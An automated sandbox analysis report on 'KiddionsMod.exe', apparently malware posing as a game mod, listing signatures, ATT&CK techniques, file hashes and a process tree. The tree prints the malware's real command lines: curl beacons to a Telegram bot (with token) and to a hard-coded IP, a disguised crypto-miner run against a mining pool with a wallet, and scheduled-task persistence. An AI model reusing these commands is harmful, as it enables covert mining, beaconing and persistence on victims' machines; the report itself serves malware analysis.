Analysis

  • max time kernel
    156s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    19-01-2022 21:45

General

  • Target

    KiddionsMod.exe

  • Size

    1.3MB

  • MD5

    19cfd5a417830805d328cc9e09dc14c1

  • SHA1

    836b391c349ae25da63c33438aa6a8f4b1e10748

  • SHA256

    cb69d24dbd59161cdbc6483fe59b0fc5cec108973d5a20a0636370e7c27ab201

  • SHA512

    1b2cf065b606d65e2253fda80c15848d80d3a1e0b5ab11f3cb3b73864704ca90a8d99d6e92ca45b95269dc04612822883ea87eb31da5fcd5fd992a02ab36546b

Malware Config

Signatures

  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 13 IoCs
  • Sets service image path in registry 2 TTPs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 42 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 10 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 10 IoCs
  • Suspicious use of SetThreadContext 21 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\KiddionsMod.exe
    "C:\Users\Admin\AppData\Local\Temp\KiddionsMod.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2828
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      #cmd
      2⤵
      • Checks computer location settings
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3084
      • C:\Users\Admin\AppData\Local\Temp\loader.exe
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Adds Run key to start application
        • Checks whether UAC is enabled
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2756
        • C:\Windows\SYSTEM32\curl.exe
          curl "https://api.telegram.org/bot5080602212:AAFzGPp7yFVoPgAstCfae6JTAOpzgmOhueI/sendMessage?chat_id=-1001744615146&text=%F0%9F%99%88 New worker!%0AGPU: Microsoft Basic Display Adapter%0AWorker Tag: Krutoi"
          4⤵
            PID:4020
          • C:\Windows\bfsvc.exe
            C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX
            4⤵
              PID:2772
            • C:\Windows\explorer.exe
              C:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1484
              • C:\Windows\SYSTEM32\curl.exe
                curl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"
                5⤵
                  PID:2016
                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                  "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                  5⤵
                  • Executes dropped EXE
                  • Checks BIOS information in registry
                  • Adds Run key to start application
                  • Checks whether UAC is enabled
                  • Suspicious use of SetThreadContext
                  • Suspicious use of WriteProcessMemory
                  PID:3908
                  • C:\Windows\bfsvc.exe
                    C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX
                    6⤵
                      PID:2828
                    • C:\Windows\explorer.exe
                      C:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"
                      6⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:556
                      • C:\Windows\SYSTEM32\curl.exe
                        curl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"
                        7⤵
                          PID:3484
                        • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                          "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                          7⤵
                          • Executes dropped EXE
                          • Checks BIOS information in registry
                          • Adds Run key to start application
                          • Checks whether UAC is enabled
                          • Suspicious use of SetThreadContext
                          PID:1544
                          • C:\Windows\bfsvc.exe
                            C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX
                            8⤵
                              PID:756
                            • C:\Windows\explorer.exe
                              C:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"
                              8⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:1420
                              • C:\Windows\SYSTEM32\curl.exe
                                curl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"
                                9⤵
                                  PID:3740
                                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                  "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                  9⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Adds Run key to start application
                                  • Checks whether UAC is enabled
                                  • Suspicious use of SetThreadContext
                                  PID:1720
                                  • C:\Windows\bfsvc.exe
                                    C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX
                                    10⤵
                                      PID:1956
                                    • C:\Windows\explorer.exe
                                      C:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"
                                      10⤵
                                        PID:224
                                        • C:\Windows\SYSTEM32\curl.exe
                                          curl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"
                                          11⤵
                                            PID:2988
                                          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                            "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                            11⤵
                                            • Executes dropped EXE
                                            • Checks BIOS information in registry
                                            • Adds Run key to start application
                                            • Checks whether UAC is enabled
                                            • Suspicious use of SetThreadContext
                                            PID:2856
                                            • C:\Windows\bfsvc.exe
                                              C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX
                                              12⤵
                                                PID:3392
                                              • C:\Windows\explorer.exe
                                                C:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"
                                                12⤵
                                                  PID:3024
                                                  • C:\Windows\SYSTEM32\curl.exe
                                                    curl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"
                                                    13⤵
                                                      PID:452
                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                      13⤵
                                                      • Executes dropped EXE
                                                      • Checks BIOS information in registry
                                                      • Adds Run key to start application
                                                      • Checks whether UAC is enabled
                                                      • Suspicious use of SetThreadContext
                                                      PID:2928
                                                      • C:\Windows\bfsvc.exe
                                                        C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX
                                                        14⤵
                                                          PID:1944
                                                        • C:\Windows\explorer.exe
                                                          C:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"
                                                          14⤵
                                                            PID:3300
                                                            • C:\Windows\SYSTEM32\curl.exe
                                                              curl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"
                                                              15⤵
                                                                PID:3520
                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                                15⤵
                                                                • Executes dropped EXE
                                                                • Checks BIOS information in registry
                                                                • Adds Run key to start application
                                                                • Checks whether UAC is enabled
                                                                • Suspicious use of SetThreadContext
                                                                PID:2368
                                                                • C:\Windows\bfsvc.exe
                                                                  C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX
                                                                  16⤵
                                                                    PID:220
                                                                  • C:\Windows\explorer.exe
                                                                    C:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"
                                                                    16⤵
                                                                      PID:2016
                                                                      • C:\Windows\SYSTEM32\curl.exe
                                                                        curl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"
                                                                        17⤵
                                                                          PID:2708
                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                                          17⤵
                                                                          • Executes dropped EXE
                                                                          • Checks BIOS information in registry
                                                                          • Adds Run key to start application
                                                                          • Checks whether UAC is enabled
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:3060
                                                                          • C:\Windows\bfsvc.exe
                                                                            C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX
                                                                            18⤵
                                                                              PID:3580
                                                                            • C:\Windows\explorer.exe
                                                                              C:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"
                                                                              18⤵
                                                                                PID:1340
                                                                                • C:\Windows\SYSTEM32\curl.exe
                                                                                  curl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"
                                                                                  19⤵
                                                                                    PID:1372
                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                                                    19⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks BIOS information in registry
                                                                                    • Adds Run key to start application
                                                                                    • Checks whether UAC is enabled
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:2580
                                                                                    • C:\Windows\bfsvc.exe
                                                                                      C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX
                                                                                      20⤵
                                                                                        PID:2376
                                                                                      • C:\Windows\explorer.exe
                                                                                        C:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"
                                                                                        20⤵
                                                                                          PID:904
                                                                                          • C:\Windows\SYSTEM32\curl.exe
                                                                                            curl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"
                                                                                            21⤵
                                                                                              PID:3208
                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                                                              21⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks BIOS information in registry
                                                                                              • Adds Run key to start application
                                                                                              • Checks whether UAC is enabled
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:1284
                                                                                              • C:\Windows\bfsvc.exe
                                                                                                C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX
                                                                                                22⤵
                                                                                                  PID:2732
                                                                                                • C:\Windows\explorer.exe
                                                                                                  C:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"
                                                                                                  22⤵
                                                                                                    PID:3964
                                                                                                    • C:\Windows\SYSTEM32\curl.exe
                                                                                                      curl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"
                                                                                                      23⤵
                                                                                                        PID:912
                                                              • C:\Users\Admin\AppData\Roaming\asf3r3.exe
                                                                "C:\Users\Admin\AppData\Roaming\asf3r3.exe"
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3100
                                                              • C:\Users\Admin\AppData\Roaming\e3dwefw.exe
                                                                "C:\Users\Admin\AppData\Roaming\e3dwefw.exe"
                                                                3⤵
                                                                • Executes dropped EXE
                                                                PID:2412
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
                                                                  4⤵
                                                                  • Creates scheduled task(s)
                                                                  PID:828
                                                          • C:\Windows\System32\WaaSMedicAgent.exe
                                                            C:\Windows\System32\WaaSMedicAgent.exe dc10dc428c424782dfda32cfa06f8fbf oWLZ1E4gW0a9DAkkf1GvUg.0.1.0.0.0
                                                            1⤵
                                                            • Modifies data under HKEY_USERS
                                                            PID:624
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k LocalService
                                                            1⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1836
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k LocalService
                                                            1⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1160
                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:3900
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
                                                              2⤵
                                                              • Creates scheduled task(s)
                                                              PID:1896

                                                          Network

                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                          Execution

                                                          Scheduled Task

                                                          1
                                                          T1053

                                                          Persistence

                                                          Registry Run Keys / Startup Folder

                                                          2
                                                          T1060

                                                          Scheduled Task

                                                          1
                                                          T1053

                                                          Privilege Escalation

                                                          Scheduled Task

                                                          1
                                                          T1053

                                                          Defense Evasion

                                                          Virtualization/Sandbox Evasion

                                                          1
                                                          T1497

                                                          Modify Registry

                                                          2
                                                          T1112

                                                          Credential Access

                                                          Credentials in Files

                                                          2
                                                          T1081

                                                          Discovery

                                                          Query Registry

                                                          5
                                                          T1012

                                                          Virtualization/Sandbox Evasion

                                                          1
                                                          T1497

                                                          System Information Discovery

                                                          5
                                                          T1082

                                                          Collection

                                                          Data from Local System

                                                          2
                                                          T1005

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads

                                                          • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                            MD5

                                                            1393255baa29e16a2a5cf2afa989e1e8

                                                            SHA1

                                                            37e362a244a64dc1ab3aa34b0f39fc96134abd02

                                                            SHA256

                                                            dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875

                                                            SHA512

                                                            a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d

                                                          • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                            MD5

                                                            1393255baa29e16a2a5cf2afa989e1e8

                                                            SHA1

                                                            37e362a244a64dc1ab3aa34b0f39fc96134abd02

                                                            SHA256

                                                            dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875

                                                            SHA512

                                                            a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d

                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
                                                            MD5

                                                            67486b272027c5c08c37d2a7dfa3b019

                                                            SHA1

                                                            660cd3fa71e480e03b392ccfff95b1a651ec1563

                                                            SHA256

                                                            cb2f3c7a11ff1993ed3a24d396beeca0f06842b9cd9097351a7c8662250ec677

                                                            SHA512

                                                            6565af5f8e090285258a0abf4faa1c99790b409f4ed8a4233048614ca470f1d7c4a40f951bd7c2664c567f7788f9e689afb3d72fcff853d888fef5b40051cf61

                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
                                                            MD5

                                                            67486b272027c5c08c37d2a7dfa3b019

                                                            SHA1

                                                            660cd3fa71e480e03b392ccfff95b1a651ec1563

                                                            SHA256

                                                            cb2f3c7a11ff1993ed3a24d396beeca0f06842b9cd9097351a7c8662250ec677

                                                            SHA512

                                                            6565af5f8e090285258a0abf4faa1c99790b409f4ed8a4233048614ca470f1d7c4a40f951bd7c2664c567f7788f9e689afb3d72fcff853d888fef5b40051cf61

                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                            MD5

                                                            1393255baa29e16a2a5cf2afa989e1e8

                                                            SHA1

                                                            37e362a244a64dc1ab3aa34b0f39fc96134abd02

                                                            SHA256

                                                            dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875

                                                            SHA512

                                                            a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d

                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                            MD5

                                                            1393255baa29e16a2a5cf2afa989e1e8

                                                            SHA1

                                                            37e362a244a64dc1ab3aa34b0f39fc96134abd02

                                                            SHA256

                                                            dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875

                                                            SHA512

                                                            a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d

                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                            MD5

                                                            1393255baa29e16a2a5cf2afa989e1e8

                                                            SHA1

                                                            37e362a244a64dc1ab3aa34b0f39fc96134abd02

                                                            SHA256

                                                            dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875

                                                            SHA512

                                                            a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d

                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                            MD5

                                                            1393255baa29e16a2a5cf2afa989e1e8

                                                            SHA1

                                                            37e362a244a64dc1ab3aa34b0f39fc96134abd02

                                                            SHA256

                                                            dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875

                                                            SHA512

                                                            a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d

                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                            MD5

                                                            1393255baa29e16a2a5cf2afa989e1e8

                                                            SHA1

                                                            37e362a244a64dc1ab3aa34b0f39fc96134abd02

                                                            SHA256

                                                            dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875

                                                            SHA512

                                                            a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d

                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                            MD5

                                                            1393255baa29e16a2a5cf2afa989e1e8

                                                            SHA1

                                                            37e362a244a64dc1ab3aa34b0f39fc96134abd02

                                                            SHA256

                                                            dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875

                                                            SHA512

                                                            a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d

                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                            MD5

                                                            1393255baa29e16a2a5cf2afa989e1e8

                                                            SHA1

                                                            37e362a244a64dc1ab3aa34b0f39fc96134abd02

                                                            SHA256

                                                            dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875

                                                            SHA512

                                                            a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d

                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                            MD5

                                                            1393255baa29e16a2a5cf2afa989e1e8

                                                            SHA1

                                                            37e362a244a64dc1ab3aa34b0f39fc96134abd02

                                                            SHA256

                                                            dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875

                                                            SHA512

                                                            a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d

                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                            MD5

                                                            1393255baa29e16a2a5cf2afa989e1e8

                                                            SHA1

                                                            37e362a244a64dc1ab3aa34b0f39fc96134abd02

                                                            SHA256

                                                            dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875

                                                            SHA512

                                                            a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d

                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                            MD5

                                                            1393255baa29e16a2a5cf2afa989e1e8

                                                            SHA1

                                                            37e362a244a64dc1ab3aa34b0f39fc96134abd02

                                                            SHA256

                                                            dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875

                                                            SHA512

                                                            a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d

                                                          • C:\Users\Admin\AppData\Roaming\asf3r3.exe
                                                            MD5

                                                            654b0fbc5f45e7aa0d208a9ae2352f30

                                                            SHA1

                                                            d91b8b6a3d1815010973db6189fc1f7b73e98dd8

                                                            SHA256

                                                            808bad1396611118abb83a7d09940c7c47d785511db2e5b652becf9ec67cdb19

                                                            SHA512

                                                            807a471d51a5e7f22f19a7cd0775f852519c256b3592136b4f673dcc8b53488698c5830d75cfc461937a5a485963c37e1eb4e18c40446ac241df1b859a242234

                                                          • C:\Users\Admin\AppData\Roaming\asf3r3.exe
                                                            MD5

                                                            654b0fbc5f45e7aa0d208a9ae2352f30

                                                            SHA1

                                                            d91b8b6a3d1815010973db6189fc1f7b73e98dd8

                                                            SHA256

                                                            808bad1396611118abb83a7d09940c7c47d785511db2e5b652becf9ec67cdb19

                                                            SHA512

                                                            807a471d51a5e7f22f19a7cd0775f852519c256b3592136b4f673dcc8b53488698c5830d75cfc461937a5a485963c37e1eb4e18c40446ac241df1b859a242234

                                                          • C:\Users\Admin\AppData\Roaming\e3dwefw.exe
                                                            MD5

                                                            67486b272027c5c08c37d2a7dfa3b019

                                                            SHA1

                                                            660cd3fa71e480e03b392ccfff95b1a651ec1563

                                                            SHA256

                                                            cb2f3c7a11ff1993ed3a24d396beeca0f06842b9cd9097351a7c8662250ec677

                                                            SHA512

                                                            6565af5f8e090285258a0abf4faa1c99790b409f4ed8a4233048614ca470f1d7c4a40f951bd7c2664c567f7788f9e689afb3d72fcff853d888fef5b40051cf61

                                                          • C:\Users\Admin\AppData\Roaming\e3dwefw.exe
                                                            MD5

                                                            67486b272027c5c08c37d2a7dfa3b019

                                                            SHA1

                                                            660cd3fa71e480e03b392ccfff95b1a651ec1563

                                                            SHA256

                                                            cb2f3c7a11ff1993ed3a24d396beeca0f06842b9cd9097351a7c8662250ec677

                                                            SHA512

                                                            6565af5f8e090285258a0abf4faa1c99790b409f4ed8a4233048614ca470f1d7c4a40f951bd7c2664c567f7788f9e689afb3d72fcff853d888fef5b40051cf61

                                                          • memory/224-225-0x0000000140000000-0x000000014002A000-memory.dmp
                                                            Filesize

                                                            168KB

                                                          • memory/556-189-0x0000000140000000-0x000000014002A000-memory.dmp
                                                            Filesize

                                                            168KB

                                                          • memory/904-301-0x0000000140000000-0x000000014002A000-memory.dmp
                                                            Filesize

                                                            168KB

                                                          • memory/1284-314-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/1284-316-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/1284-315-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/1340-292-0x0000000140000000-0x000000014002A000-memory.dmp
                                                            Filesize

                                                            168KB

                                                          • memory/1420-207-0x0000000140000000-0x000000014002A000-memory.dmp
                                                            Filesize

                                                            168KB

                                                          • memory/1484-170-0x0000000140000000-0x000000014002A000-memory.dmp
                                                            Filesize

                                                            168KB

                                                          • memory/1484-169-0x0000000140000000-0x000000014002A000-memory.dmp
                                                            Filesize

                                                            168KB

                                                          • memory/1544-202-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/1544-203-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/1544-204-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/1720-221-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/1720-220-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/1720-222-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/2016-274-0x0000000140000000-0x000000014002A000-memory.dmp
                                                            Filesize

                                                            168KB

                                                          • memory/2368-269-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/2368-270-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/2368-271-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/2580-298-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/2580-297-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/2580-296-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/2756-167-0x00007FF7575B0000-0x00007FF757E98000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/2756-165-0x00007FF7575B0000-0x00007FF757E98000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/2756-166-0x00007FF7575B0000-0x00007FF757E98000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/2772-168-0x0000000140000000-0x000000014274C000-memory.dmp
                                                            Filesize

                                                            39.3MB

                                                          • memory/2828-133-0x0000000005BD0000-0x0000000005C62000-memory.dmp
                                                            Filesize

                                                            584KB

                                                          • memory/2828-137-0x0000000005F70000-0x0000000005FE6000-memory.dmp
                                                            Filesize

                                                            472KB

